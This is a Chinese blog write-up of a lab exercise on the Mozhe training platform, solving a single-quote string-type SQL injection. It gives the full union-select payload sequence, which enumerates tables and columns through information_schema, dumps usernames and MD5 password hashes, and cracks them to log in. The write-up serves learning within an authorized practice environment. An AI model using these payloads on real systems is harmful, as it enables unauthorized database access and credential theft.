赞
踩
此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!
墨者靶场是一个不用自己搭建就可以用的靶场,十分适合懒得搭建靶场又想练习的小白选手。网址在此:https://www.mozhe.cn/
点击访问即可
通过上一关我们知道了注入位置在哪,我们就不赘述。点击
进去发现id默认是字符串,那么觉有可能是字符型注入了,而且此关名字也是字符型注入。(如图所示)
注入语句为
id=tingjigonggao'
发现报错(如图所示)
再次注入
id=tingjigonggao' and 1=1--+
id=tingjigonggao' and 1=2--+
发现1=1正常,1=2报错,所以是单引号闭合。(如图所示)
(如图所示)注入语句为
id=tingjigongao' order by 1
数字1逐次提升发现是5报错。说明字段数为4
注入语句为
id=tingjigongao' union select 1,2,3,4--+
发现显位2,3(如图所示)
注入语句为
id=tingjigongao' union select 1,user(),database(),4--+
得到用户root@localhost,数据库名mozhe_discuz_stormgroup
注入语句为
id=tingjigongao' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--+
得到表为notice,stormgroup_member(如图所示)
注入语句为
id=tingjigongao' union select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema=database() and table_name="stormgroup_member"--+
得到列名为id,name,password,status(如图所示)
注入语句为
id=tingjigongao' union select 1,group_concat(name),group_concat(password),4 from stormgroup_member--+
得到密码和账号名字,密码去MD5解码
解码得到一个是dsan13,这个不能用。还有一个是850119(如图所示)
登录用户得到key
这一关是get提交字符型单引号闭合注入,此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。